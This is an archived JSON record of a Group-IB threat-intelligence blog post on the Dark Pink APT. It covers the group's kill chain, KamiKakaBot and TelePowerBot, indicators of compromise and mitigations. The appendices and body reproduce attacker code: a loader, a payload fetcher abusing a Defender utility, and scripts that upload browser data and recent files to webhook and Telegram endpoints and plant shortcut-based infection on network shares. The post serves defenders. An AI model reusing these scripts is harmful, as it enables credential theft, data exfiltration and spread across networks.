{
	"id": "289ea252-413b-40a7-a898-5e706e2f193b",
	"created_at": "2026-04-06T00:11:09.391016Z",
	"updated_at": "2026-04-10T03:36:19.27735Z",
	"deleted_at": null,
	"sha1_hash": "06a5539bcd70e3a9fafa4e2dfd13b2df57305d4d",
	"title": "Latest techniques of the Dark Pink APT | Group-IB Blog",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 166571,
	"plain_text": "Andrey Polovinkin\r\nTeam Lead Reverse Research, APAC\r\nDark Pink. Episode 2\r\nAPT Dark Pink is back with 5 victims in new countries.\r\nMay 31, 2023 · Advanced Persistent Threats\r\nhttps://www.group-ib.com/blog/dark-pink-episode-2/\r\nPage 1 of 27\r\n\r\nAPT Dark Pink Threat Intelligence\r\nIn early January, the Group-IB Threat Intelligence unit published a detailed report describing the techniques and tools used by a new APT (Advanced Persistent Threat) group codenamed Dark Pink by Group-IB (also tracked under the name Saaiwc Group). The name Dark Pink was coined by forming a hybrid of some of the email addresses used by the threat actors during data exfiltration. This threat actor has been operating since mid-2021, mainly in the Asia-Pacific region. The group uses a range of sophisticated custom tools and deploys multiple kill chains that rely on spear-phishing emails. Once the attackers gain access to a target’s network, they use advanced persistence mechanisms to stay undetected and maintain control over the compromised system.\r\nAs we continued to track the group’s activity, we identified new tools, exfiltration mechanisms and victims in new industries, in countries that Dark Pink has never targeted before.\r\nAs shown on the updated attack timeline below, overall, Group-IB’s Threat Intelligence identified 13 organizations targeted by the group. Our previous analysis uncovered 8 attacks on entities based in the Asia-Pacific region and 1 organization based in Europe, including one unsuccessful attack. According to the latest findings, 5 new victims have been identified by Group-IB, which suggests that the actual scope of the attacks could be even broader. Dark Pink has continued to attack government, military, and non-profit organizations in the Asia-Pacific region, expanding its operations to Thailand and Brunei. Another victim, an educational sector organization, has also been identified in Belgium.\r\nIt is important to emphasize that Dark Pink has carried out at least two attacks since the beginning of 2023. The most recent attack known to Group-IB started in April, with the latest files being detected in May. This means that the group shows no signs of slowing down.\r\nIn line with Group-IB’s zero tolerance policy to cybercrime, we sent proactive warnings to all confirmed and potential victims.\r\nTechnical indicators obtained during threat intelligence gathering activities suggest that Dark Pink keeps updating their tools to slip undetected past defense mechanisms and remains highly active.\r\nIn this blog, the Group-IB team analyzes the latest updates in Dark Pink’s toolset, the evolution of the group’s exfiltration methods, and modifications of their kill chain. The blog dives deep into the latest TTPs of Dark Pink, observed during the group’s latest attacks. CISOs, corporate cybersecurity teams, incident response specialists, and threat intelligence experts will find the list of mitigation techniques as well as the latest indicators of compromise to better protect themselves against the activity of Dark Pink.\r\nKey findings\r\nFive new victims of Dark Pink have been identified by Group-IB.\r\nDark Pink expanded its operations to Belgium, Brunei, and Thailand.\r\nThe group remains highly active with two successful attacks carried out since the beginning of 2023.\r\nDark Pink’s new account on GitHub has been discovered and analyzed by Group-IB researchers.\r\nDark Pink leveraged the functionalities of an MS Excel add-in to ensure the persistence of TelePowerBot within the infected system.\r\nDark Pink keeps updating its existing toolset to remain undetected.\r\nIn a recent attack, Dark Pink exfiltrated stolen data over HTTP using a service called Webhook.\r\nDark Pink most likely uses different LOLBin techniques to evade detection on infected machines.\r\nKamiKakaBot’s functionality has been split into two distinct parts: controlling devices and stealing sensitive data.\r\nIn addition to distributing payloads through GitHub, the threat actors used the service TextBin.net for the same purpose.\r\nDark Pink’s Modified Kill Chain\r\nOn May 17, 2023, a file named “[Update] Counterdraft on the MoU on Rice Trade.zip.iso” was uploaded to VirusTotal. This ISO image is typical for Dark Pink and contains several items including a signed file, a decoy document, and a malicious DLL. The infection chain matches the most recent infection chain described in our previous report. The threat actor continues to use the MSBuild utility for launching KamiKakaBot (a tool designed to read and execute commands from a threat actor-controlled Telegram channel via a Telegram bot) in the infection chain. The group has been using tools with the same functionalities as in previous attacks. Most of the changes seem to be intended to impede static analysis.\r\nThe threat actors include an MS Word program inside the ISO image. The file has a “.docx” extension in its name and features the MS Word icon to trick the victim into thinking it is safe to open. When the DLL file is launched through sideloading, the XML file that initiates the next stage of the attack is decrypted from the decoy document and saved onto the infected computer. The encrypted XML data is located at the end of the decoy document: the DLL identifies the last zero byte and starts decrypting from there. The decryption process results in an XML file that will be launched by MSBuild when the user logs into the system.\r\nIn the new version, KamiKakaBot’s functionality has been split into two distinct parts: controlling devices and stealing sensitive data. As before, KamiKakaBot is loaded directly into memory without being stored on the filesystem. The main part of KamiKakaBot has the same logic and has not changed from the initially discovered version. We examined several different samples and in every case the attackers added obfuscation to make static analysis more difficult.\r\nWhile analyzing different variants of KamiKakaBot, we noticed that the same functionality can be implemented in different ways. For example, in the version of KamiKakaBot analyzed in our previous report about the group, the ID of the last read message and the Telegram token were stored in registry keys. In the latest version, however, both are stored in files. Upon launching, a file named %TEMP%\\tmpTCD1-10dA-401B-A104.tmp is created, and it contains the string \u003cTG_TOKEN\u003e:\u003cMESSAGE_ID\u003e. This file is then updated whenever a message is read or if the threat actor decides to change the bot token. It is important to note that the filename is hardcoded inside the sample and can differ from case to case.\r\nThe table below contains examples of commands that KamiKakaBot can receive from the attackers. The third column shows commands from the first discovered KamiKakaBot. Column number five lists commands from the last sample.\r\n# | Description | Different variations of KamiKakaBot’s command\r\n1 | Steal data from web browser | CMD_BROWS | GETBRWS | 34\r\n2 | Update XML file | CMD_UPDATEXML | XMLNEW | 45\r\n3 | Update Telegram token | CMD_UPDATETOKEN | TOKENNEW | 91\r\n4 | Send bot/victim identifier | SH0WUP | 1*\r\n5 | Download and execute arbitrary script | 4869%URL% (the 4869 sequence is the “Hi” string in hex representation; if the file download is successful, the bot returns 4869d (Hi\\x0d), otherwise 4869e (Hi\\x0e))\r\n6 | Execute command in cmd.exe |\r\nWhile executing MSBuild, an additional module is created on the infected system. Its name follows a random pattern generated as [1-9]{4}-[1-9]{4}-[1-9]{4}-[1-9]{4}. The module is saved in the %TMP% directory of the infected system. The module is loaded and deleted while KamiKakaBot.Main is launched.\r\nThe collection process has not changed since the previous version. It involves compiling a list of files from web browsers such as Mozilla Firefox, Google Chrome, and MS Edge. Each file is then copied to a designated folder. Finally, a ZIP archive is created with a randomly generated name by KamiKaka.Main according to the pattern [1-9]{6}-[1-9]{5}-[1-9]{5}-[1-9]{4}.tmp. In the case of Google Chrome and MS Edge, the key to decrypt encrypted logins and passwords is extracted and added to the archive. The list of collected files is shown below:\r\nMozilla Firefox: key4.db, key3.db, cookies.sqlite, logins.json, autofill-profiles.json\r\nGoogle Chrome/MS Edge: Login Data\\, Login Data For Account\\, Cookies\\\r\nPersistence and lateral movement\r\nWhile researching for our previous blog post, we discovered only one GitHub account used during all the attacks, which suggests that Dark Pink may have remained undetected for a long time. Malware initialized by the threat actors can issue commands for an infected machine to download modules from the GitHub account. While analyzing this threat, we discovered a new Dark Pink account on GitHub (hXXps://github[.]com/peterlyly). The first commit is dated Jan. 9th, 2023. This is the day when the first public mention of this group appeared.\r\nDark Pink has hidden the repository. What makes the move noteworthy is that the repository was deactivated when the URLs pointing to files within the repositories were being uploaded to VirusTotal.\r\nDark Pink rarely performs commits on GitHub. Overall, 12 commits were performed between January 9 and April 11, 2023. They contain PowerShell scripts, zip archives, and custom malware as in previous attacks. A few files such as ZMsg and Netlua have already been analyzed by Group-IB Threat Intelligence. The tool ZMsg was designed to steal information from Zalo, an instant messenger. Dark Pink uses Netlua to elevate privileges and launch PowerShell commands. More details can be found in our previous blog post. The zip archive contains three files: the encrypted payload, the signed executable, and the loader.\r\nFirst, the threat actors update scripts used to infect new devices. Yet the script was not updated correctly, most likely due to haste, and the payload was downloaded from the old GitHub account. For this reason, the file bbb.gif was uploaded twice. This PowerShell script combines exfiltrating files and infecting files on common network resources. The first part of the script sorts files in the %APPDATA%\\Roaming\\Microsoft\\Windows\\Recent directory. Because the Recent directory contains shortcuts to the most recently used files on the system, the script first resolves the original file path of each shortcut, then filters the files based on their last write time and file extension. For each file that meets the criteria, the script copies it to the temp directory, compresses it and sends it to a specific chat via the Telegram API. Finally, the copies of the original file in the temp folder are deleted. The second part retrieves a list of SMB shares, downloads the zip archive from GitHub, and saves it to the local directory. Then, instead of creating original files on storage, the script creates LNK files with a command to launch a malicious executable from the archive. The infection mechanism of new devices has not been changed from the previous one.\r\nWe have already discussed this part in our previous blog post on Dark Pink. A full version of the script can be found in the appendix section.\r\nAs we have already noted, Dark Pink uses spear-phishing to gain initial access and installs the self-developed malware TelePowerBot and KamiKakaBot, both of which leverage Telegram bot functionality for communication with the threat actor. The droppers of the communication modules (TelePowerDropper/KamiKakaDropper) were designed to be launched once to persist the communication modules on infected machines. The main disadvantage of this approach is that the attackers can lose control if TelePowerBot or KamiKakaBot are discovered. For this reason, the threat actors developed a special module to check whether TelePowerBot has gained persistence.\r\nInstead of checking the bots every time that a device is turned on, checks are carried out only when certain conditions are met. The method is not new and has been widely discussed. The functionality was designed as a Microsoft Excel add-in library. An MS Excel add-in extends Excel’s functionality by providing custom functions, macros, or tools. In this case, the function xlAutoOpen was overridden to start malicious activity every time that Excel was started. During the infection, the threat actor executes a simple PowerShell script to download add-ins from GitHub to the Excel startup directory (%APPDATA%\\Microsoft\\Excel\\XLSTART) on the infected device. The XLL files are delivered and placed in the directory using a simple PowerShell script (see the appendix section).\r\nAll strings in the binaries are encrypted using a simple XOR algorithm, but the key is derived from arguments relating to the launching process. This simple trick would help to avoid detection if somebody tried to upload this file to a sandbox or performed a static analysis. The key is calculated based on two arguments. The first part of the key is the name of the launched process: excel.exe. The final part of the key is the extension of the file being opened in Excel, which should be .xlsx. If all conditions are met, the strings will be decrypted correctly.\r\nIt is worth noting that the same archive with an Excel add-in was available in the old GitHub account too (hXXps://raw.githubusercontent[.]com/efimovah/abcd/main/ccc.gif). We observed that in addition to distributing payloads through GitHub, the threat actors used the service TextBin.net for the same purpose. TextBin.net is an online platform where users can store and share text-based information. By simply changing the URL to the payload, threat actors can maintain their anonymity while delivering malware. We identified two direct links used for downloading TelePowerBot. These TelePowerBot variants do not contain a hardcoded token. They retrieve the Telegram token from registry keys, which enables the threat actors to access and control the bots’ functionalities.\r\nData exfiltration\r\nDark Pink used various methods and services to exfiltrate stolen data. Information from stealers was sent to a Telegram chat in a zip archive. In the past we have seen data being exfiltrated using email or publicly available cloud services such as DropBox. In a recent attack, Dark Pink exfiltrated stolen data over HTTP using a service called Webhook. Webhook.site is a powerful and versatile service that allows users to easily inspect, test, and debug HTTP requests and webhooks. With webhook.site, it is possible to set up temporary endpoints in order to capture and view incoming HTTP requests. The threat actor created temporary endpoints and sent sensitive data stolen from victims using the simple command below:\r\n$ui='hXXps://webhook[.]site/288a834b-fd92-4531-82a5-b41e907daa56';\r\n$dt=$env:userprofile+'\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Web\r\n(New-Object System.Net.WebClient).UploadFile($ui,$dt);\r\nFurthermore, Dark Pink has been seen to replace the Webhook service with a Windows server. The motive behind this change remains unclear given that in the past Dark Pink has usually favored public free-to-use services. It is worth noting that the script mentioned earlier also involves creating a new WebClient object, defining a file path, and subsequently uploading the file to the designated URL using the PUT method.\r\nThe IP address of the aforementioned Dark Pink Windows server is 176.10.80[.]38. As shown by Group-IB’s proprietary Graph Network Analysis tool, the IP address had multiple connections with various entities at different points in time, including Meterpreter. This may indicate that Dark Pink could also be employing widely used instruments in their attacks in addition to their custom toolset.\r\nReconnaissance\r\nWe have identified multiple instances when Dark Pink used unconventional methods, which is not unusual for the group. For instance, when launching TelePowerBot, they modified the default file association and used SyncAppvPublishingServer.vbs to initiate TelePowerBot. As regards the process of downloading archives, the files are downloaded using the ConfigSecurityPolicy utility, a component of Windows Defender used for managing settings and facilitating file transfers. In the case of downloads, the files can be found in the cache folder at %LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE. Refer to the provided commands on lines 36 and 37 for an example.\r\nDuring the reconnaissance stage, Dark Pink executed simple PowerShell commands, presumably to check whether specific files could be found on the infected device. The executed commands are listed below:\r\ngi \"C:\\Program Files (x86)\\Windows Kits\\10\\bin\\*\\*\\AccChecker\\AccCheckConsole.exe\"\r\ngi \"C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\*\\remote.exe\"\r\ngi \"C:\\Program Files *\\Internet Explorer\\Extexport.exe\"\r\ngi \"C:\\Program Files*\\Microsoft Office\\*\\MSPUB.exe\",\r\ngi \"C:\\Program Files*\\Microsoft Office\\Office*\\MSOHTMED.exe\"\r\ngi \"C:\\Program Files\\dotnet\\dotnet.exe\"\r\ngi \"C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*\\bin\\Pester.bat\"\r\ngi \"C:\\Windows\\diagnostics\\system\\WindowsUpdate\\CL_Invocation.ps1\"\r\ngi \"C:\\Windows\\Microsoft.NET\\Framework*\\*\\ilasm.exe\"\r\ngi \"C:\\Windows\\WinSxS\\amd64_*\\Runscripthelper.exe\"\r\nAlthough specific examples of these tools being used have not been discovered, based on our research into and experience with Dark Pink, we believe that all of these tools can be used for proxy execution or downloading malicious payloads. The table below explains how the cybercriminals can use these tools on infected devices:\r\nProgram name | Possible uses | Examples\r\nAccCheckConsole.exe | Loads a managed DLL in the context of AccCheckConsole.exe | https://lolbas-project.github.io/lolbas/OtherMSBinaries/AccChe\r\nremote.exe | Executes a process under a trusted Microsoft signed binary | https://lolbas-project.github.io/lolbas/OtherMSBinaries/Remote\r\nExtexport.exe | Executes DLL files | https://lolbas-project.github.io/lolbas/Binaries/Ext\r\nMSPUB.exe | Downloads payloads from remote servers | https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mspub/\r\nMSOHTMED.exe | Downloads payloads from remote servers | https://lolbas-project.github.io/lolbas/OtherMSBinaries/MsoHtm\r\nConclusion\r\nOur most recent analysis of the group’s operations uncovered that Dark Pink attacked 13 organizations, five of which were new victims. Furthermore, the geographic distribution of the targeted organizations is worth noting. Although most attacks occurred in the Asia-Pacific region, two organizations based in Europe were also on the victim list, which means that the threat actor’s geography could be broader than initially thought.\r\nThe fact that two attacks were executed in 2023 indicates that Dark Pink remains active and poses an ongoing risk to organizations. Evidence shows that the cybercriminals behind these attacks keep updating their existing tools in order to remain undetected.\r\nAll of the above means that all organizations must always be watchful and take proactive steps to protect themselves. Keeping up with the latest threats and regularly updating security tools and measures is essential.\r\nRecommendations\r\nUse modern email protection measures to prevent initial compromise through spear-phishing emails. We recommend Group-IB Business Email Protection, which counters such threats effectively.\r\nFoster a strong cybersecurity culture in your workplace, including training staff to identify phishing emails.\r\nEnsure that your security measures allow for proactive threat hunting in order to identify threats that cannot be detected automatically.\r\nLimit access to file-sharing resources, except those used within the organization.\r\nMonitor LNK files being created in unusual locations, such as network drives and USB devices.\r\nObserve any use of commands and built-in tools that are frequently used for collecting information about the system and files.\r\nDevelop command line usage benchmarks for commonly used LOLBin techniques to uncover possible malicious activities.\r\nImplement a monitoring system to detect any images mounted in the system, thereby proactively protecting against infections and identifying potential malicious activities.\r\nKeeping your organization secure requires ongoing vigilance. Using a proprietary solution such as Group-IB Threat Intelligence can help shore up your security posture by equipping your security teams with the latest insights into new and emerging threats.\r\nIndicators of compromise\r\nBelow, you will find a list of indicators of compromise linked to the recent activities associated with Dark Pink. The list has been collected by the Group-IB Threat Intelligence unit. We’ll be publishing newly discovered IOCs in Group-IB’s Threat Intelligence Twitter account. If you would like to contribute to our blog with the indicators related to Dark Pink, shoot us an email at blog@group-ib.com.\r\nFiles:\r\n[Update] Counterdraft on the MoU on Rice Trade.zip.iso: 6b7c4ce5419e7cde80856a85559203dca5219d05115cdd6c1598f2e789149c34\r\nwwlib.dll: 8dc3f6179120f03fd6cb2299dbc94425451d84d6852b801a313a39e9df5d9b1a\r\n~[INDONESIA] COUNTERDRAFT MOU ON RICE TRADE INDONESIA-INDIA 15052023.DOC: 78ec064bce850d0e0a022cdbb84a6200e62f92e8e575ebbd4a9b764dc1dce771\r\nMS Project file: 54675c16c1fd97227cb41892431e1f9f8b0b153225b5576445d3ba24860dcfd9\r\nccc.gif: 115a66aba1068be11e549c4194dda5f338684ae37ffbfc9045c0bae488a5acf4\r\nAccHelper.xll: 6d620e86fd37c9b92a0485b0472cb1b8e2b1662fbb298c4057f8d12ad42808b4\r\nRegistry paths:\r\nHKCU:\\Environment\\PSH\r\nHKCU:\\Environment\\SYSB\r\nHKCU:\\Environment\\TPM\r\nURLs:\r\nhXXps://webhook[.]site/288a834b-fd92-4531-82a5-b41e907daa56\r\nhXXps://webhook[.]site/2b733e31-70bb-4777-be4a-41a98f3559bf\r\nhXXp://raw.githubusercontent[.]com/peterlyly/zxcv/main/xxx.gif\r\nhXXp://raw.githubusercontent[.]com/peterlyly/zxcv/main/ccc.gif\r\nhXXp://raw.githubusercontent[.]com/peterlyly/zxcv/main/DDDD.gif\r\nhXXp://raw.githubusercontent[.]com/peterlyly/zxcv/main/eeeee.gif\r\nhXXps://raw.githubusercontent[.]com/peterlyly/zxcv/main/eeeee.gif\r\nhXXps://raw.githubusercontent[.]com/peterlyly/zxcv/main/xxx.gif\r\nhXXps://raw.githubusercontent[.]com/peterlyly/zxcv/main/eee.gif\r\nhXXps://raw.githubusercontent[.]com/peterlyly/zxcv/main/ccc.gif\r\nhXXps://raw.githubusercontent[.]com/peterlyly/zxcv/main/bbb.gif\r\nhXXps://textbin[.]net/raw/1tmfbi0bep\r\nhXXps://textbin[.]net/raw/d7hs6e68ox\r\nhXXp://176.10.80[.]38:8843/upload\r\nhXXp://176.10.80[.]38:8843/11.msi\r\nhXXp://176.10.80[.]38:8843/1.zip\r\nMITRE ATT\u0026CK\r\nTactic | MITRE ID | Technique\r\ninitial-access | T1091 | Replication Through Removable Media\r\ninitial-access | T1566.002 | [Phishing-\u003eSpearphishing Link]\r\nexecution | T1204.002 | [User Execution-\u003eMalicious File]\r\nexecution | T1059.001 | [Command and Scripting Interpreter-\u003ePowerShell]\r\nexecution | T1053.005 | [Scheduled Task/Job-\u003eScheduled Task]\r\nexecution | T1059.005 | [Command and Scripting Interpreter-\u003eVisual Basic]\r\nexecution | T1059.003 | [Command and Scripting Interpreter-\u003eWindows Command Shell]\r\npersistence | T1574.002 | [Hijack Execution Flow-\u003eDLL Side-Loading]\r\nAPPENDIX A. Example of new XML file\r\n\u003c![CDATA[\n using System;\n using System.Reflection;\n using Microsoft.Build.Framework;\n using Microsoft.Build.Utilities;\n using System.IO;\n using System.IO.Compression;\n using System.Text;\n\npublic class Office_runtime : Microsoft.Build.Utilities.Task, ITask\n {\n public static byte[] AamlYlJd_vm_;\n public static byte[] YjE_c_oZzFdhBaW;\n public static byte[] xt__RzP_rEFQ_ = new byte[] {REDACTED};\n public static string WlJbbGOGij = \"REDACTED\"\n public static byte[] KQISfIU_Xy_ = new byte[] {104, 249, 1, 152, 206, 213};\n public override bool Execute()\n {\n for (int i = 0; i \u003c 100;i++)\n if ( i % 5==4)\n {\n break;\n }\n else if (i % 5==0)\n {\n AamlYlJd_vm_ = Convert.FromBase64String(WlJbbGOGij);\n for (int j = 0;j \u003c AamlYlJd_vm_.Length; j++)\n AamlYlJd_vm_[j] = (byte)(AamlYlJd_vm_[j] ^ KQISfIU_Xy_[j % KQISfIU_Xy_.Len\n Kanjdj1();\n } else {\n j1hndf1();\n YjE_c_oZzFdhBaW= new byte[]{54,50,51,50,50,48,52,49,54,53};\n };\n\nreturn true;\n}\r\n public static int Kanjdj1()\r\n {\r\n int zz=11;\r\n int yasd=22;\r\n return zz+ yasd;\r\n }\r\n public static int j1hndf1()\r\n {\r\n int x = 1;\r\n int y = 2;\r\n return x + y;\r\n }\r\n public static string GenRandName()\r\n {\r\n string s = \"\";\r\n var rd = new Random();\r\n for (int i = 0; i \u003c 16; i++)\r\n {\r\n if (i%4==0 \u0026\u0026 i \u003e 0)\r\n s=s+'-';\r\n s = s + rd.Next(1, 9).ToString();\r\n }\r\n return s;\r\n }\r\n public static string init_br()\r\n {\r\n for (int i = 0 ;i \u003c xt__RzP_rEFQ_.Length;i++)\r\n {\r\n xt__RzP_rEFQ_[i] = (byte)(xt__RzP_rEFQ_[i] ^ KQISfIU_Xy_[i % KQISfIU_Xy_.L\r\n }\r\n string _br_dl = GenRandName() + \".tmp\";\r\n _br_dl = Environment.ExpandEnvironmentVariables(String.Format(@\"%TMP%\\\\{0}\r\n if (File.Exists(_br_dl))\r\n File.Delete(_br_dl);\r\n File.WriteAllBytes(_br_dl,xt__RzP_rEFQ_);\r\n File.SetAttributes(_br_dl,FileAttributes.Hidden);\r\n return _br_dl;\r\n }\r\n public static void _akqnadRnf()\r\n {\r\n j1hndf1();\r\n Kanjdj1();\r\n string ksddNvLr_ukEw = init_br();\r\n string jt_tzcoQYash_ = Encoding.Default.GetString(YjE_c_oZzFdhBaW);\r\n var inputStream = new MemoryStream(AamlYlJd_vm_);\r\n ZipArchive archive = new ZipArchive(inputStream, ZipArchiveMode.Read);\r\n ZipArchiveEntry archEntry = archive.Entries[0];\r\n Stream entryStream = archEntry.Open();\r\n var tmpMem = new MemoryStream();\r\n entryStream.CopyTo(tmpMem);\r\n var xtmp = tmpMem.ToArray();\r\n var ytld = Assembly.Load(xtmp);\r\n \r\n byte[] vfrr = Convert.FromBase64String(\"REDACTED\");\r\n foreach (Type type in ytld.GetExportedTypes())\r\n {\r\n try\r\n {\r\n var c = Activator.CreateInstance(type);\r\n type.InvokeMember(\"6gelkCas8K\", BindingFlags.InvokeMethod, null, c\r\n }\r\n catch { continue; }\r\n }\r\n }\r\n }\r\n]]\u003e\r\nAPPENDIX B. Example of a script to install add-ins\r\nscriptblock = {\r\n$uri = \"hXXps://raw.githubusercontent[.]com/peterlyly/zxcv/main/ccc.gif\";\r\nstart \"C:\\\\Program Files\\\\Windows Defender\\\\ConfigSecurityPolicy.exe\" -ArgumentLis\r\n$file = (gi \"$env:localappdata\\\\Microsoft\\\\Windows\\\\INetCache\\\\IE\\\\*\\\\ccc*.gif\" -f\r\nexpand $file \"$env:tmp\\\\ccc.zip\";sleep 10;rm $file -force\r\nExpand-Archive -Path \"$env:temp\\\\ccc.zip\" -DestinationPath \"$env:temp\" -force\r\nni \"$env:appdata\\\\Microsoft\\\\Excel\\\\XLSTART\" -ItemType Directory\r\nreplace \"$env:temp\\\\ccc\\\\ANALYS32.xll\" \"$env:appdata\\\\Microsoft\\\\Excel\\\\XLSTART\" /\r\nreplace \"$env:temp\\\\ccc\\\\AccHelper.xll\" \"$env:appdata\\\\Microsoft\\\\Excel\\\\XLSTART\"\r\n};Start-Job $scriptblock\",\r\nAPPENDIX C. Example of a bbb.gif file\r\n$reg=\"HKCU:\\Environment\";\r\n$token,$chat_id=(gp $reg -name GUID2).GUID2 -split \"::\"\r\n$time=get-date -date ((gp $reg -name TIME).TIME);\r\ngi $env:APPDATA\\M*\\W*\\R*\\*|sort LastWriteTime|?{$_.FullName -like \"*.lnk\" -and $_.LastWrit\r\n$tp = (New-Object -comObject WScript.Shell).CreateShortcut($_.FullName).TargetPath\r\nif((\"\" -ne $tp) -and (Test-Path $tp -PathType Leaf) -and ($tp -notlike \"*.exe\")){\r\n $file = $tp;\r\n $ascii = [System.Text.Encoding]::ascii;\r\n $file=$ascii.getstring($ascii.getbytes(\"$($env:COMPUTERNAME)_$($file)\")) -replace\r\n cp -path $tp -Destination \"$env:temp\\$file\"\r\n Compress-Archive -Path \"$env:temp\\$file\" -Destination \"$env:temp\\$file.zip\" -Force\r\n Add-Type -AssemblyName System.Net.Http\r\n $form = new-object System.Net.Http.MultipartFormDataContent\r\n $form.Add($(New-Object System.Net.Http.StringContent $Chat_ID), 'chat_id')\r\n $Content = [System.IO.File]::ReadAllBytes(\"$env:temp\\$file.zip\")\r\n $byte = New-Object System.Net.Http.ByteArrayContent ($Content, 0, $Content.Length)\r\n $byte.Headers.Add('Content-Type','text/plain')\r\n $form.Add($byte, 'document', \"$file.zip\")\r\n $ms = new-object System.IO.MemoryStream\r\n $form.CopyToAsync($ms).Wait()\r\n try {irm -Method Post -Body $ms.ToArray() -Uri \"https://api.telegram.org/bot$token\r\n catch {Start-Sleep 30;irm -Method Post -Body $ms.ToArray() -Uri \"https://api.teleg\r\n $time = $_.LastWriteTime\r\n sp -Path $reg -Name \"Time\" -Value $time.tostring('yyyy-MM-dd HH:mm:ss') -Force\r\n rm \"$env:temp\\$file\" -Force -Recurse\r\n rm \"$env:temp\\$file.zip\" -Force -Recurse\r\n}\r\n}\r\n$list_paths = @()\r\n$list_paths += (get-smbshare|?{($_.Description -notin (\"Default share\",\"Remote IPC\",\"Print\r\n$list_paths += (Get-SMBMapping|?{$_.Status -eq \"OK\"})|%{if($_){$_.path}}\r\n$list_paths += gi $env:APPDATA\\M*\\W*\\R*\\*|?{$_.FullName -like \"*.lnk\"}|%{(New-Object -comO\r\nif($list_paths.count -ne 0){\r\ntry{Expand-Archive -Path \"$env:temp\\xxx.zip\" -DestinationPath \"$env:temp\" -force}catch{\r\n$uri = \"https://github.com/peterlyly/zxcv/raw/main/xxx.gif\";\r\nstart \"C:\\Program Files\\Windows Defender\\ConfigSecurityPolicy.exe\" -ArgumentList $\r\n$file = (gi \"$env:localappdata\\Microsoft\\Windows\\INetCache\\IE\\*\\xxx*.gif\" -force)\r\nexpand $file \"$env:tmp\\xxx.zip\";sleep 10;rm $file -force\r\nExpand-Archive -Path \"$env:temp\\xxx.zip\" -DestinationPath \"$env:temp\" -force\r\n}\r\n$list_paths = $list_paths |%{(gci $_ -Recurse -Directory -Force|?{$_.name -notin ('dism',\r\n$list_paths|%{if($null -eq $_){return}\r\ncp \"$env:temp\\xxx\" \"$_\\dism\" -Recurse -Force;\r\nsc \"$_\\system.bat\" -value \"@echo off`ncd %cd%dism`nstart dism.exe`nexit\";\r\nattrib +s +h \"$_\\dism\";attrib +s +h \"$_\\dism\\*.*\";attrib +s +h \"$_\\system.bat\";\r\n(Gci \"$_\\\" -Directory -force)|?{$_.name -notin ('dism','$RECYCLE.BIN','System Volu\r\n if($null -eq $_){return}\r\n attrib +s +h \"$($_.fullname)\"\r\n $WshShell = New-Object -comObject WScript.Shell\r\n $Shortcut = $WshShell.CreateShortcut(\"$($_.fullname).lnk\")\r\n $Shortcut.TargetPath = \"%SystemRoot%\\System32\\cmd.exe\"\r\n $Shortcut.Arguments = \"/c start explorer $($_.name) \u0026\u0026 system.bat \u0026\u0026 exit\"\r\n $Shortcut.IconLocation = \"%SystemRoot%\\System32\\SHELL32.dll,4\"\r\n $Shortcut.WorkingDirectory = \"%cd%\"\r\n $Shortcut.Save()}\r\n}}",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://www.group-ib.com/blog/dark-pink-episode-2/"
	],
	"report_names": [
		"dark-pink-episode-2"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "fd4c3ddd-11cc-4192-9c94-ff107d7f8492",
			"created_at": "2023-02-18T02:04:24.06294Z",
			"updated_at": "2026-04-10T02:00:04.644528Z",
			"deleted_at": null,
			"main_name": "Dark Pink",
			"aliases": [
				"Saaiwc Group"
			],
			"source_name": "ETDA:Dark Pink",
			"tools": [
				"Ctealer",
				"Cucky",
				"KamiKakaBot",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"PowerSploit",
				"TelePowerBot",
				"ZMsg"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "fbe45970-1e9e-4a82-bc06-46317a248479",
			"created_at": "2026-02-03T02:00:03.45132Z",
			"updated_at": "2026-04-10T02:00:03.947304Z",
			"deleted_at": null,
			"main_name": "DarkPink",
			"aliases": [
				"Saaiwc"
			],
			"source_name": "MISPGALAXY:DarkPink",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434269,
	"ts_updated_at": 1775792179,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/06a5539bcd70e3a9fafa4e2dfd13b2df57305d4d.pdf",
		"text": "https://archive.orkl.eu/06a5539bcd70e3a9fafa4e2dfd13b2df57305d4d.txt",
		"img": "https://archive.orkl.eu/06a5539bcd70e3a9fafa4e2dfd13b2df57305d4d.jpg"
	}
}